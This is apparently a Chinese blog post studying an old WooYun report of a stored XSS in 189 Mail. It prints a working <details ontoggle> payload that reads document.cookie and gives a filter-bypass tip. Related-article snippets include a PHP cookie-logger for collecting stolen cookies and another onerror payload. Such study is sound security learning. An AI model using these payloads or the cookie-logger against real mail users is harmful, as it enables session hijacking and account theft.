【漏洞学习——XSS】189邮箱一处XSS

利用on事件绕过XSS过滤

最新推荐文章于 2025-10-25 11:37:40 发布

原创最新推荐文章于 2025-10-25 11:37:40 发布 · 866 阅读

0 ·

CC 4.0 BY-SA版权

【渗透测试实战】同时被 2 个专栏收录

160 篇文章

订阅专栏

乌云漏洞案例学习

75 篇文章

订阅专栏

本文介绍了一种在JavaScript中使用on事件绕过XSS过滤的方法，通过在QQ邮箱源码模式下发送包含<details>标签的XSS攻击代码，可在Google Chrome、Opera、Safari等浏览器下执行。此方法需要添加一些文字内容以避免被拦截。

漏洞细节

额javascript中on事件挺多，找了个不被过滤的。。。
为了方便操作用QQ邮箱源码模式进行发送，为了发送成功需要添加一些文字内容不然会被拦截

<details ontoggle="confirm(document.cookie)">
   xss
   <summary>click me</summary>xssxssxss
</details>

可在Google Chrome Opera Safari下执行，我在Chrome上测试的。

参见：https://bugs.shuimugan.com/bug/view?bug_no=128793

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

WEB漏洞——XSS

qq_63594215的博客

04-10

1239

JavaScript是一种直译式的脚本语言、是一种动态类型、弱类型、基于原型的语言，内置支持类型。虽然JavaScript使用了Java这个名称，但实际上JavaScript与Java之间并没有任何关系。XSS攻击最终目的是在网页中嵌入客户端恶意代码，最常用的攻击代码是JavaScript语言，但也会使用其它的脚本语言，例如：ActionScript、VBScript。而如今的胡来那我客户端脚本基本上是基于JavaScript，所以如果想要深入研究xss，必须要精通JavaScript。

为什么你的网站总被“黑”？C# XSS防护的10个致命漏洞与救星方案！

java专栏

05-11

920

本文深入探讨了XSS（跨站脚本攻击）的严重性及其防护策略。通过分析XSS漏洞的“十大罪状”，文章揭示了用户输入直接输出、富文本编辑器未净化等常见问题。针对这些问题，文章提供了从0到1的XSS防护实战方案，包括使用ASP.NET Core内置防护、AntiXSS库、JavaScript转义、CSP头、输入验证等多种技术手段。此外，文章还介绍了高级技巧，如白名单模式过滤富文本、C#代码转义、OWASP AntiSamy库等，帮助开发者构建更智能的防护系统。最后，文章总结了常见错误及解决方案，提醒开发者在实际应用

参与评论您还未登录，请先登录后发表或查看评论

sohu邮箱xss漏洞

swordheart的博客

04-14

373

漏洞详情披露状态： 2010-07-23：细节已通知厂商并且等待厂商处理中 1970-01-01：厂商已经确认，细节仅向厂商公开 1970-01-11：细节向核心白帽子及相关领域专家公开 1970-01-21：细节向普通白帽子公开 1970-01-31：细节向实习白帽子公开 2010-08-22：细节向公众公开简要描述： sohu,sogou邮箱xss,可能传播蠕虫详细说明：全角字符形式ｅｘｐｒｅｓｓｉｏｎ表达式未被过滤。而全角字符形式的ｅｘｐｒｅｓｓｉｏｎ能够被IE6解析并

CVE-2018-6882 Zimbra邮件系统XSS漏洞利用

weixin_30343157的博客

05-08

1681

CVE-2018-6882是一个存储型XSS漏洞，利用该漏洞可获取目标邮箱的收件箱、发件箱等邮件内容。也可以给目标邮箱绑定一个“辅助邮箱”，当目标邮箱收到新邮件时“辅助邮箱”也会收到相同的邮件，实现对目标邮箱的实时监控。漏洞细节请大家参考这篇文章：https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vu...

【漏洞学习——XSS】TOM邮箱存储型XSS一枚

Fly_鹏程万里

02-22

581

漏洞细节首先在个人签名的标题和内容处输入"><img src="#" onerror=alert('22222222222')> 点击保存写一封信一直都是服务繁忙，发送不出去于是对签名内容进行base64加密打开收到的邮件，成功触发弹cookie 修复建议加强过滤...

【网安第三章】——XSS

lyj1597374034的博客

10-20

891

反射型XSS攻击通常发生在Web应用程序未能充分处理用户输入的情况下。攻击者利用应用程序的漏洞，将恶意脚本嵌入到URL参数中，当受害者点击这个恶意链接时，Web应用程序会将URL参数的内容作为响应的一部分发送给用户浏览器，导致恶意脚本执行。实战演练：反射型XSS攻击步骤环境搭建：攻击者首先需要一个存在XSS漏洞的Web页面。在实战演练中，我们可以使用如DVWA（Damn Vulnerable Web Application）这样的脆弱应用程序来模拟环境。

XSS漏洞利用——获取cookie

cxrpty的博客

02-20

1967

实验环境：DVWA 实验步骤：一、在服务器创建一个1.php文件获取cookie值，并将cookie值写入1.txt中 php代码如下： <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...

小白也能看懂的JavaScript安全漏洞——XSS,CSRF等攻击的全面解析

最新发布

zhengfei611的博客

10-25

811

JavaScript 是一种高级的、解释型的编程语言");// 输出到控制台- 轻量级、解释型语言- 支持面向对象、函数式编程- 主要用于网页交互- 现在也可用于服务端(Node.js)

油猴-189邮箱邮件提醒

平淡如茶

10-23

1923

// ==UserScript== // @name mailRemind // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author axing // @match https...

腾讯邮箱反射型xss

weixin_34255055的博客

10-19

266

2019独角兽企业重金招聘Python工程师标准>>> ...

python邮件管理

weixin_41089778的博客

04-05

9896

python邮件管理一、基本概念1、协议简介2、邮箱地址189邮箱(SSL加密)公司邮箱(SSL加密)QQ邮箱(SSL加密)二、代码展示1、SMTP发送邮件构造邮件发送邮件添加邮件标题、收/发件人一、基本概念 1、协议简介 POP3 收邮件。允许电子邮件客户端下载服务器上的邮件，但是在客户端的操作（如移动邮件、标记已读等），不会反馈到服务器上。 IAMP 收邮件。在电子邮件客户端收取的邮件仍然保留在服务器上，同时在客户端上的操作都会反馈到服务器上。 SMTP 发邮件。必须在提供了账户名和密码之后才可以登

QQ邮箱有效的XSS payload

怡帆的博客

05-21

1533

在阅读完道哥的《白帽子讲WEB安全》后，对QQ邮箱的XSSpayload技痒，遂在QQ邮箱中进行尝试，以下为尝试过程和有效的payload代码

QQ邮箱反射型xss漏洞

Coisini的博客

06-13

3271

……，对，我印象中写过了，刚才因为需要要用，搜索了一下，是空的，嘶嘶嘶～可怕～起因甲方“一个人的安全部”的时候，一个研发的同事在设计一项报表功能时，因为受到邮箱的安全限制无法很好的实现，于是将情况反馈给我。说实话，我对浏览器的安全也不太了解，案头的书翻了几页就没再动过，于是对比了腾讯邮箱的做法，发现了这个xss。背景公司使用coremail搭建企业邮箱，开发做了一个通过邮件发送h...

QQ邮箱鸡肋存储型XSS漏洞利用

weixin_30412577的博客

09-18

378

最近学习XSS跨站时，刚好发现了QQ邮箱的一个XSS漏洞。具体的漏洞信息已提交乌云：wooyun-2013-037371 现在主要是做下简单的总结，也是自己第一次，马克一下。对于这个漏洞的利用，一、使用了标签属性劫持,这个没什么好说的二、使用Flash的跨域，Flash使用的As3脚本从未接触过，本着语言都相通的思想，尝试写了一个盗取cookie的as3脚本，当写成功后...

悬镜安全丨雅虎邮箱存储型XSS漏洞，黑客可以看到你发的每一个邮件

Anprou的博客

12-13

1527

演示了恶意攻击者如何利用XSS漏洞攻下雅虎邮箱，将受害者收件箱中的邮件发到外部站点；以及构建病毒，这个病毒可以通过向邮件签名中添加恶意脚本，附加在所有传出的电子邮件中。由于恶意代码就位于邮件消息的正文中，代码会在受害者打开邮件时立即执行，不需要其他交互过程。所有问题的症结实际上在于雅虎邮箱无法正确过滤HTML邮件中潜在的恶意代码。

189邮件收取

junjun56的专栏

11-11

5157

该部分只到如何获取所有邮件，并没有实现下载收取功能，其实只差一步而已，不想写了，需要的可以参考《搜狐邮件收取》，以下是代码段 package com.hackerant.test; import java.io.InputStream; import java.net.URLDecoder; import java.util.ArrayList; import java.util.Da

攻击者查看邮件就被溯源到家？

顶峰

02-22

926

本文通过案例形象地再现了钓鱼邮件及钓鱼邮件反制，基于“删繁就简”的原则，在不使用重量级武器如“免杀木马反制”、“钓鱼URL反制”等手段，以信息收集为主要溯源手段，向读者阐述了相关技术，旨在与各位从业及爱好者探讨交流。本文通过案例形象地再现了钓鱼邮件及钓鱼邮件反制，基于“删繁就简”的原则，在不使用重量级武器如“免杀木马反制”、“钓鱼URL反制”等手段，以信息收集为主要溯源手段，向读者阐述了相关技术，旨在与各位从业及爱好者探讨交流。

XSS漏洞入门与常见场景分析

资源摘要信息:"那些年我们一起学XSS1"是一篇系统性介绍跨站脚本攻击（XSS）基础知识与实战技巧的技术文档，重点围绕不同场景下的XSS注入方式、过滤机制的绕过策略以及实际应用中的典型案例展开。文章从最基础的无...